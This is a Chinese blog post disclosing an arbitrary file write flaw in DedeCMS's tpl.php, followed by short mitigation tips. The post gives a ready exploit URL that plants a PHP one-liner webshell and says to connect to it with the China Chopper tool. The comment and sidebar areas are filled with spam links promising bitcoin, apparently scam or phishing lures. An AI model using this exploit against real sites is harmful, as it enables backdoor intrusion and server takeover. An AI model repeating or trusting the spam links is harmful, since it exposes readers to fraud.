小灰博客--小灰IT技术博客 | sky00.com

织梦CMS最新任意写入漏洞

文章来源:小灰博客| 时间:2018-07-30 16:32:20| 作者:Leo | 5 条评论

文章分类:IT技术分享PHP安全技术     标签:

今天服务器提示有webshell文件,上去看下确实是被写入了一句话木马。顺藤摸瓜发现织梦/dede/tpl.php竟然存在任意写入漏洞,也不知道这个漏洞有多久了,是否被公开,既然发现了就记录下把,具体是利用tpl.php的文件管理功能,对标签的一个写入漏洞。exp是这样的

1
www.xxx.com/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php%20$s=create_function(%27%27,$_REQUEST[x]);$s();?%3E&filename=leo.lib.php

访问确定后会在/include/taglib/目录下面生成一个叫leo.lib.php的文件。这个文件里面是一句话木马,就是url里写的PHP代码,如图

(图丢了,自己领悟)

具体想写什么在url里带入就行,接下来上菜刀,链接即可。需要注意一点,生成的文件名必须是 xxx.lib.php

具体防护方法修改后台路径肯定是必不可少的 ,当然现在曝下织梦路径也不是什么难事,首先可以关闭/include/taglib/下的写入权限,其次其实很多网站根本用不着文件管理器,建议直接把tpl.php文件删除或者重命名。


如果该文章帮到了您,不妨帮忙分享支持下博主!
同时也欢迎各位技术爱好者加入IT技术群(点击即可):70035098 互相交流学习!

分享该文章到:

5 条评论

  1. You have received a notification № 252423. Read >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=8b618b6f3e2558ea545b01f25c66ea45&说道:
    2025 年 1 月 22 日 下午 9:04

    z91sjl

    回复
  2. You have 1 message(-s) № 618. Go > https://telegra.ph/Message--2868-12-25?hs=8b618b6f3e2558ea545b01f25c66ea45&说道:
    2024 年 12 月 26 日 上午 2:02

    crsdu6

    回复
  3. 今日头条说道:
    2019 年 10 月 28 日 下午 11:44

    文章不错支持一下吧

    回复
  4. 头条说道:
    2019 年 1 月 24 日 下午 11:37

    文章不错非常喜欢

    回复
  5. 骨骼尚美说道:
    2018 年 12 月 9 日 下午 10:59

    不错的文章,学习了

    回复


发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注


分类

存档检索

IT技术分享

最新评论

  • + 0.75788585 BTC.GET - https://telegra.ph/Get-BTC-right-now-01-22?hs=9e710a17c6f1893b8975843ad65a53ec&:80ymq4
  • You have a email № 897905. Read >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=7fc809c4247ff3bb3e2b81fd7b90d625&:whaht3
  • You have received a message # 76978. Go >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=3da051666d269a0bc63a99730221a24b&:pt6kzb
  • You got a transfer from user. Get => https://telegra.ph/Get-BTC-right-now-01-22?hs=3f08de96112b4bab631df916e9c95f9e&:zi27wf
  • You have received a notification № 252423. Read >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=8b618b6f3e2558ea545b01f25c66ea45&:z91sjl
  • We send a transfer from unknown user. Continue >> https://telegra.ph/Get-BTC-right-now-01-22?hs=e4c49dd9cb5ed33f97a29bc92a741521&:iiaw99
  • You have a transaction from unknown user. GЕТ => https://telegra.ph/Ticket--6974-01-15?hs=9e710a17c6f1893b8975843ad65a53ec&:409z2a
  • Ticket: TRANSFER 0,75924235 BTC. Next => https://telegra.ph/Ticket--6974-01-15?hs=8f87d0d2843e103c87c4bd683c9bda39&:mqjjeh
  • Email- Transaction #WX47. ASSURE > https://telegra.ph/Ticket--6974-01-15?hs=48af46897a78ce23e02d3d6d91453c82&:30gz1l
  • You have 1 email № 583291. Open >> https://telegra.ph/Ticket--6974-01-15?hs=46cca2220f62b645c465c3659609f169&:hudwy0
  • Notification; TRANSACTION 0.75415746 BTC. Assure >> https://telegra.ph/Ticket--6974-01-15?hs=e8e513973712a3c92cfc5061bded6465&:6zm4xv
  • Notification: TRANSACTION 0,75847329 bitcoin. Next => https://telegra.ph/Ticket--6974-01-15?hs=78ee8b109ef1383fa4708aeb263ae5fb&:rx6muv
  • We send a gift from us. Receive > https://telegra.ph/Message--2868-12-25?hs=9e710a17c6f1893b8975843ad65a53ec&:10tou3
  • Message: Operation 1,82387 bitcoin. Continue >>> https://telegra.ph/Message--2868-12-25?hs=55c3e989c8fdd036165c4bcc7c546cc2&:bv7ewv
  • You have received 1 message(-s) # 913. Go >> https://telegra.ph/Message--2868-12-25?hs=5af3ecd2025eafc0e90768d67a58cc03&:wy2bom
  • Ticket: Operation 1,82536 BTC. Assure >>> https://telegra.ph/Message--2868-12-25?hs=36dc3bdc6f6177f66ac19e016914d415&:ei588v
  • Email- You got a transfer №HE29. NEXT >> https://telegra.ph/Message--2868-12-25?hs=3f08de96112b4bab631df916e9c95f9e&:zl3efj
  • You have received 1 notification # 675. Open > https://telegra.ph/Message--2868-12-25?hs=d9564a149cf7ebbc725fcfce1bd3d512&:z3xcf1
  • You have received 1 notification # 195. Read - https://telegra.ph/Message--2868-12-25?hs=d2e9f25426f06f324d26af9866fa1537&:uvn3a3
  • Notification- Process NoKZ98. NEXT >> https://telegra.ph/Message--2868-12-25?hs=20abb68ac955ac5538a5ae131902e2a0&:32ucvg

标签云

.svg不支持 100+刷机 app设计 ascii/16进制的unicode/汉字之间转换工具 dedecms dedecms邮件验证 dede表单时间戳转化 HTML/CSS IIS+PHP IIS漏洞 IOS Jsvascript Leo MYSQL mysql注入 PHP PHP彩蛋 pigcms seajs Win2003 Windows wordpress zip破解 囧事笑话 安全教程 小程序 微信 微信开发 微信浏览器 微网站 手机浏览器不显示图片 手机浏览器打开网站跳转代码 收缩页面 文件夹权限 更改本地IP 查看开机密码 百度云ROM 百度地图 破解隔壁无线网 网站底部固定报名栏 节奏大师歌曲离线包 街景接口 让电脑阅读你的文字内容 静态网页微信分享图 默认浏览器